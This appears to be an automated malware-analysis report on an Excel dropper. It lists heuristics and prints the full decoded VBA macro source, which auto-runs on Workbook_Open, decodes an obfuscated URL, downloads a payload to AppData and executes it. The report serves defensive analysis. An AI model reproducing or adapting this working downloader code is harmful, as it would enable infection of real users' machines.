MALICIOUS
276
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample is an Excel document containing VBA macros that are automatically executed upon opening due to the Workbook_Open event. The macro uses URLDownloadToFile to download a payload from the decrypted URL 'fyf/`efohjT`ltcwvzR0psf{0mq/{jc/eqvujyjnfmjo00;tquui' and saves it to the AppData directory as 'Xls.Dropper.Agent-9337433-0'. Subsequently, ShellExecuteA is called to execute the downloaded file, indicating a dropper functionality.
Heuristics 8
-
ClamAV: Xls.Dropper.Agent-9337433-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Agent-9337433-0
-
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOADReference to URLDownloadToFile API
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
Private Declare Function DDBGe Lib "urlmon" Alias _ "URLDownloadToFileA" (ByVal lsWjjyCFxVleNvySvzNKt As Long, ByVal GggHPcEXDbtStEyQAWGRW As String, _ ByVal TfwKSTdBvYbHN As String, ByVal hpfKFGEJuBIY As Long, ByVal zzPFH As Long) As Long -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP = Environ$("AppData") & "\" & eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM -
Reference to ShellExecute API high SC_STR_SHELLEXECReference to ShellExecute API
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6798 bytes |
SHA-256: 26c97b14415416399a8312a7194dc8a22a6b777d5a0afd7d53779bde5e1542a1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub Sib()
End Sub
Attribute VB_Name = "SiloKkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare Function BIYzzPFHzYBg Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal zYBgeLAULCPbJIwwXgsUoT As Long, ByVal sJVJHBTQnWiokvMNjkuR As String, _
ByVal ycrXexFvbVWUZKE As String, ByVal LpQBRVXPpRwhdQm As String, ByVal cShrZZMzZwJXEVIMmZXRkh As String, ByVal DZyEALOezAKT As Long) As Long
Private Declare Function DDBGe Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal lsWjjyCFxVleNvySvzNKt As Long, ByVal GggHPcEXDbtStEyQAWGRW As String, _
ByVal TfwKSTdBvYbHN As String, ByVal hpfKFGEJuBIY As Long, ByVal zzPFH As Long) As Long
Sub MLoVnY()
Dim BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn As String
Dim eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM As String
Dim CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP As String
Dim cFgTbNhjukioplmnbvcxzASDFghJUYHGtRfehrOlPlmJNHgthyui As String
Dim QyhndwsxeOlpokmnjHyhgtRfcvdefThyujOlpKMJuhyVbNc As String
Dim DbghyhujikolpokmNHghDDeWqaZXSXCDvetyrtghjuikdfvrtyJD As String
eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM = Decrypt("fyf/xxdd")
CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP = Environ$("AppData") & "\" & eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM
BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn = Decrypt("fyf/`efohjT`ltcwvzR0psf{0mq/{jc/eqvujyjnfmjo00;tquui")
DDBGe 0, BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn, CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP, 0, 0
BIYzzPFHzYBg 0, "open", CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP, "", vbNullString, vbNormalFocus
End Sub
Sub Workbook_Open()
MLoVnY
End Sub
Function Decrypt(enc)
Dim x, m_
Dim AppData, daor As Variant
enc = StrReverse(enc)
For m = 1 To Len(enc)
x = Mid(enc, m, 1)
AppData = AppData & Chr(Asc(x) - 1)
Next
Decrypt = AppData
For d = 1 To Len(doar)
doar = ""
Next
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Processing file: /tmp/qstore_dvbsbmbi
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/Module1 - 950 bytes
' Line #0:
' FuncDefn (Sub sJVJHBTQnWiokvMNjkuR())
' Line #1:
' Line #2:
' EndSub
' _VBA_PROJECT_CUR/VBA/SiloKkbook - 4446 bytes
' Line #0:
' LineCont 0x0008 07 00 00 00 13 00 00 00
' FuncDefn (Private Declare Function LpQBRVXPpRwhdQm Lib "TfwKSTdBvYbHN" (ByVal cShrZZMzZwJXEVIMmZXRkh As Long, ByVal DZyEALOezAKT As String, ByVal shell32.dll As String, ByVal DDBGe As String, ByVal lsWjjyCFxVleNvySvzNKt As String, ByVal GggHPcEXDbtStEyQAWGRW As Long) As Long)
' Line #1:
' Line #2:
' LineCont 0x0008 07 00 00 00 13 00 00 00
' FuncDefn (Private Declare Function hpfKFGEJuBIY Lib "CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP" (ByVal zzPFH As Long, ByVal urlmon As String, ByVal MLoVnY As String, ByVal BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn As Long, ByVal eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM As Long) As Long)
' Line #3:
' Line #4:
' FuncDefn (Sub cFgTbNhjukioplmnbvcxzASDFghJUYHGtRfehrOlPlmJNHgthyui())
' Line #5:
' Dim
' VarDefn QyhndwsxeOlpokmnjHyhgtRfcvdefThyujOlpKMJuhyVbNc (As String)
' Line #6:
' Dim
' VarDefn DbghyhujikolpokmNHghDDeWqaZXSXCDvetyrtghjuikdfvrtyJD (As String)
' Line #7:
' Dim
' VarDefn Decrypt (As String)
' Line #8:
' Dim
' VarDefn Environ (As String)
' Line #9:
' Dim
' VarDefn vbNullString (As String)
' Line #10:
' Dim
' VarDefn vbNormalFocus (As String)
' Line #11:
' Line #12:
' LitStr 0x0008 "fyf/xxdd"
' ArgsLd Workbook_Open 0x0001
' St DbghyhujikolpokmNHghDDeWqaZXSXCDvetyrtghjuikdfvrtyJD
' Line #13:
' Line #14:
' LitStr 0x0007 "AppData"
' ArgsLd enc$ 0x0001
' LitStr 0x0001 "\"
' Concat
' Ld DbghyhujikolpokmNHghDDeWqaZXSXCDvetyrtghjuikdfvrtyJD
' Concat
' St Decrypt
' Line #15:
' Line #16:
' Line #17:
' LitStr 0x0034 "fyf/`efohjT`ltcwvzR0psf{0mq/{jc/eqvujyjnfmjo00;tquui"
' ArgsLd Workbook_Open 0x0001
' St QyhndwsxeOlpokmnjHyhgtRfcvdefThyujOlpKMJuhyVbNc
' Line #18:
' Line #19:
' LitDI2 0x0000
' Ld QyhndwsxeOlpokmnjHyhgtRfcvdefThyujOlpKMJuhyVbNc
' Ld Decrypt
' LitDI2 0x0000
' LitDI2 0x0000
' ArgsCall hpfKFGEJuBIY 0x0005
' Line #20:
' LitDI2 0x0000
' LitStr 0x0004 "open"
' Ld Decrypt
' LitStr 0x0000 ""
' Ld x
' Ld m_
' ArgsCall LpQBRVXPpRwhdQm 0x0006
' Line #21:
' EndSub
' Line #22:
' Line #23:
' FuncDefn (Sub AppData())
' Line #24:
' Line #25:
' ArgsCall cFgTbNhjukioplmnbvcxzASDFghJUYHGtRfehrOlPlmJNHgthyui 0x0000
' Line #26:
' EndSub
' Line #27:
' Line #28:
' Line #29:
' FuncDefn (Function Workbook_Open(daor, id_FFFE As Variant))
' Line #30:
' Dim
' VarDefn StrReverse
' VarDefn m
' Line #31:
' Dim
' VarDefn Chr
' VarDefn Asc (As Variant)
' Line #32:
' Ld daor
' ArgsLd d 0x0001
' St daor
' Line #33:
' StartForVariable
' Ld doar
' EndForVariable
' LitDI2 0x0001
' Ld daor
' FnLen
' For
' Line #34:
' Ld daor
' Ld doar
' LitDI2 0x0001
' ArgsLd Mid 0x0003
' St StrReverse
' Line #35:
' Ld Chr
' Ld StrReverse
' ArgsLd Sheet2 0x0001
' LitDI2 0x0001
' Sub
' ArgsLd Sheet1 0x0001
' Concat
' St Chr
' Line #36:
' StartForVariable
' Next
' Line #37:
' Ld Chr
' St Workbook_Open
' Line #38:
' StartForVariable
' Ld Sheet3
' EndForVariable
' LitDI2 0x0001
' Ld Workbook
' FnLen
' For
' Line #39:
' LitStr 0x0000 ""
' St Workbook
' Line #40:
' StartForVariable
' Next
' Line #41:
' EndFunc
' Line #42:
' _VBA_PROJECT_CUR/VBA/Sheet1 - 977 bytes
' _VBA_PROJECT_CUR/VBA/Sheet2 - 977 bytes
' _VBA_PROJECT_CUR/VBA/Sheet3 - 977 bytes
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.